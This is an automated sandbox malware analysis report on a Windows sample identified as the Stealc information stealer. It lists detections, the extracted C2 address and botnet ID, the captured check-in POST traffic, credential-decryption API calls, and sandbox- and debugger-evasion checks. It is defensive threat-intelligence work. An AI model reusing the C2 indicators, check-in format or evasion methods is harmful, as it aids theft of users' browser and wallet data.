
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532539
MD5: 015cafabe41e132a67c25584d105f0f0
SHA1: a4703fbfea7295fbb9bf105b5fee62d35de76c45
SHA256: 254d42da1d65f92aef7b230e84b29b358a39a7fc9465097ab4223101a8a08edf
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2836 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 015CAFABE41E132A67C25584D105F0F0)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches in network traffic (PCAP):
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Yara matches in memory dumps:
Source | Rule | Description | Author
00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2243095169.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 2836 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 2836 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Yara matches in unpacked PE files:
Source | Rule | Description | Author
0.2.file.exe.120000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-13T16:04:19.721286+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49735 | 185.215.113.37 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.120000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.phpO | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpg | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpS | Virustotal: Detection: 16%
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | Virustotal: Detection: 56%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0012C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00127240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00127240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00129AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00129B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00138EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00138EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_001338B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00134910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00134910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0012DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0012E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0012ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00134570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00134570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0012DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0012BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0012F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00133EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00133EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001216D0

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49735 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGD
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 46 43 43 35 41 32 32 45 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 2d 2d 0d 0a
    Data Ascii (CRLF line breaks restored from the raw bytes):
    ------CAKKJKKECFIDGDHIJEGD
    Content-Disposition: form-data; name="hwid"

    FBFCC5A22EA51915334237
    ------CAKKJKKECFIDGDHIJEGD
    Content-Disposition: form-data; name="build"

    doma
    ------CAKKJKKECFIDGDHIJEGD--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00124880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00124880
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 (same request as listed above: Host: 185.215.113.37, Connection: Keep-Alive, Cache-Control: no-cache)
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers and 211-byte multipart body, fields hwid=FBFCC5A22EA51915334237 and build=doma, as the POST listed above)
Source: file.exe, 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2284650077.0000000000F33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2284650077.0000000000F68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpLMEM
Source: file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpO
Source: file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
Source: file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
Source: file.exe, 00000000.00000002.2284650077.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpkn
Source: file.exe, 00000000.00000002.2284650077.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/rn
Source: file.exe, 00000000.00000002.2284650077.0000000000F33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.372

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 | 0_2_004E5070
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057F832 | 0_2_0057F832
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E20DD | 0_2_004E20DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EB8A6 | 0_2_004EB8A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FA99C | 0_2_004FA99C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E822E | 0_2_004E822E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004ED3A9 | 0_2_004ED3A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F6C1F | 0_2_004F6C1F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F7413 | 0_2_004F7413
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006134B5 | 0_2_006134B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F3E41 | 0_2_004F3E41
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E9E03 | 0_2_004E9E03
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DAE43 | 0_2_003DAE43
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F8E8D | 0_2_004F8E8D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EEF2D | 0_2_004EEF2D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E6797 | 0_2_004E6797
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 001245C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: mixhorwq ZLIB complexity 0.9949484559911242
Source: file.exe, 00000000.00000003.2243095169.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00139600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00133720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00133720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ISSD814E.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | Virustotal: Detection: 56%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1886720 > 1048576
Source: file.exe | Static PE information: Raw size of mixhorwq is bigger than: 0x100000 < 0x1a6800

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.120000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mixhorwq:EW;mafznnfz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mixhorwq:EW;mafznnfz:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00139860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cf67e should be: 0x1d94d3
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: mixhorwq
Source: file.exe | Static PE information: section name: mafznnfz
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013B035 push ecx; ret | 0_2_0013B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push ecx; mov dword ptr [esp], 35A5E242h | 0_2_004E50D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push eax; mov dword ptr [esp], 4596CAA1h | 0_2_004E5134
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push ecx; mov dword ptr [esp], ebx | 0_2_004E5141
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 153D54DDh; mov dword ptr [esp], eax | 0_2_004E5175
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push edi; mov dword ptr [esp], 7E7FF580h | 0_2_004E517A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 45F1B01Bh; mov dword ptr [esp], edi | 0_2_004E51C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push ebx; mov dword ptr [esp], 16694D25h | 0_2_004E51D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push ebp; mov dword ptr [esp], ecx | 0_2_004E526E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push eax; mov dword ptr [esp], ebx | 0_2_004E5272
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push edi; mov dword ptr [esp], 73C7B71Fh | 0_2_004E52FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 526D3E7Ah; mov dword ptr [esp], ebp | 0_2_004E5342
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 24AAFDD0h; mov dword ptr [esp], edx | 0_2_004E54D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 4046D8FCh; mov dword ptr [esp], ebx | 0_2_004E554C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push edx; mov dword ptr [esp], 3B605BC0h | 0_2_004E55B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 62483D6Eh; mov dword ptr [esp], ecx | 0_2_004E55FC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push ebp; mov dword ptr [esp], ecx | 0_2_004E56A7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 11252BF5h; mov dword ptr [esp], ecx | 0_2_004E56E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 6E253A0Bh; mov dword ptr [esp], ecx | 0_2_004E573C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push edx; mov dword ptr [esp], edi | 0_2_004E5795
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push edx; mov dword ptr [esp], 2C0B37EDh | 0_2_004E5799
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push eax; mov dword ptr [esp], ecx | 0_2_004E57EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 19C09341h; mov dword ptr [esp], edx | 0_2_004E580F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push ebx; mov dword ptr [esp], eax | 0_2_004E581C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 379C046Ch; mov dword ptr [esp], eax | 0_2_004E5862
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push ebp; mov dword ptr [esp], 4FFF73EAh | 0_2_004E5866
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push edi; mov dword ptr [esp], eax | 0_2_004E5870
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 44072BEEh; mov dword ptr [esp], ebx | 0_2_004E5892
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push ecx; mov dword ptr [esp], ebx | 0_2_004E5920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push 598F882Ch; mov dword ptr [esp], esi | 0_2_004E598D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E5070 push eax; mov dword ptr [esp], esi | 0_2_004E599E
Source: file.exe | Static PE information: section name: mixhorwq entropy: 7.953784616003966

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00139860

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13346
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FFAFD second address: 4FFB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FFB01 second address: 4FFB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FFB09 second address: 4FFB0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FFB0F second address: 4FFB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FFB13 second address: 4FFB2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F2AF93CAABCh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FFB2E second address: 4FFB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FFB35 second address: 4FFB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF93CAAC8h 0x00000009 jmp 00007F2AF93CAAC2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FFB63 second address: 4FFB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FEB08 second address: 4FEB2C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2AF93CAABEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jg 00007F2AF93CAABEh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FEC77 second address: 4FEC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FEF98 second address: 4FEFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAAC7h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FF10B second address: 4FF141 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F2AF86F4E9Ah 0x0000000c pop esi 0x0000000d pushad 0x0000000e jmp 00007F2AF86F4EA4h 0x00000013 jne 00007F2AF86F4E96h 0x00000019 popad 0x0000001a js 00007F2AF86F4E9Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
